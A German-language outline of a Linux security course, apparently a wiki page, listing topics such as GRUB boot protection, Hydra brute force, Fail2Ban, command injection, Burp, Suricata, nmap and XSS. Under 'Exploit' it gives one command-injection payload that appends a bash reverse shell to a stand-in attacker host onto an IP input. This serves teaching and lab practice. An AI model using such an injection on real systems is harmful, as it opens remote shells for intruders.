physischer Zugangsschutz

Bootzugriff absichern

• Der erste Prozess mit dem Linux gebootet wird, kann von GRUB2 bestimmt werden.
• So kann man das Passwort des root-Nutzers zurücksetzen, falls man diesen vergessen hat.
• D.h. aber auch, dass ein unautorisierter Benutzer mit Zugriff auf die physische Maschine sich eine Shell geben kann ohne Kenndaten einzugeben.
• Anleitung zu Linux boot hacking
• Man sollte also kritische Systeme mit einem GRUB Passwort vor ungewollten Änderungen der Boot-Einträge absichern
• Anleitung zum setzen eines Passworts für GRUB2

Brute Force Attacken

Hydra

SSH Daemon Konfiguration

Fail2Ban

Command Injection über eine Webanwendung

Laboraufbau

[Bearbeiten]

Schwachstelle im Code

Exploit

• 1.1.1.1 ; bash -c "bash -i >& /dev/tcp/i.p.des.hackers/port 0>&1"

SELinux

OWASP Juice Shop

Burp

Suricata

Schwachstellenerkennung/-scanning

nmap

Greenbone Security Manager

Cross Site Scripting

Office-Tools Macro-Exploit